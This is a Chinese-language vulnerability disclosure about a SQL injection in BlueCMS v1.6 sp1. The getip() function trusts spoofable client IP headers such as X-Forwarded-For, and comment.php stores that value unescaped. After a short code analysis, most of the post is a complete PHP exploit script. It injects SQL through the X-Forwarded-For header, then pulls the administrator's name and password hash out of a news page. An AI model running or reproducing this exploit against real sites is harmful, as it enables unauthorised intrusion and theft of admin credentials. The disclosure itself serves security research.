BlueCMS getip()注射漏洞
BlueCMS getip()注射漏洞
author: cnryan
team: bbs.wolvez.org
blog: http://hi.baidu.com/cnryan
一、描述
BlueCMS是一个地方分类信息门户专用CMS系统。
程序在使用getip()函数获取客户端ip时没有严格过滤数据,导致sql注射漏洞。
二、分析
//comment.php
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')"; // 注意getip()
$db->query($sql);
再看看这个函数
//include/common.fun.php
function getip() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); //可伪造 } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); //可伪造 } elseif (getenv('HTTP_X_FORWARDED')) { $ip = getenv('HTTP_X_FORWARDED'); } elseif (getenv('HTTP_FORWARDED_FOR')) { $ip = getenv('HTTP_FORWARDED_FOR'); } elseif (getenv('HTTP_FORWARDED')) { $ip = getenv('HTTP_FORWARDED'); } else { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; }
漏洞比较简单,$_SERVER老掉牙的问题。
三、利用
最后附上一个exp
<?php print_r(' +---------------------------------------------------------------------------+ BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit by cnryan Mail: cnryan2008[at]gmail[dot]com Blog: http://hi.baidu.com/cnryan +---------------------------------------------------------------------------+ '); if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Example: php '.$argv[0].' localhost /bluecms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; send(); send2(); function send() { global $host, $path; $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB"; $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99"; $data = "POST ".$path."comment.php?act=send HTTP/1.1/r/n"; $data .= "Accept: */*/r/n"; $data .= "Accept-Language: zh-cn/r/n"; $data .= "Content-Type: application/x-www-form-urlencoded/r/n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $data .= "Host: $host/r/n"; $data .= "Content-Length: ".strlen($cmd)."/r/n"; $data .= "Connection: Close/r/n"; $data .= "X-Forwarded-For: $getinj/r/n/r/n"; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } function send2() { global $host, $path; $message="GET ".$path."news.php?id=1 HTTP/1.1/r/n"; $message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*/r/n"; $message.="Accept-Language: zh-cn/r/n"; $message.="Accept-Encoding: gzip, deflate/r/n"; $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)/r/n"; $message.="Host: $host/r/n"; $message.="Connection: Keep-Alive/r/n/r/n"; $fd = fsockopen($host,'80'); if(!$fd) { echo '[-]No response from'.$host; die; } fputs($fd,$message); $resp = ''; while (!feof($fd)) { $resp.=fgets($fd); } fclose($fd); preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db); if($db[1][0]&$db[2][0]) { echo "username->".$db[1][0]."/r/n"; echo "password->".$db[2][0]."/r/n"; echo "[+]congratulation ^ ^"; }else die('[-]exploited fail >"<'); } ?>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论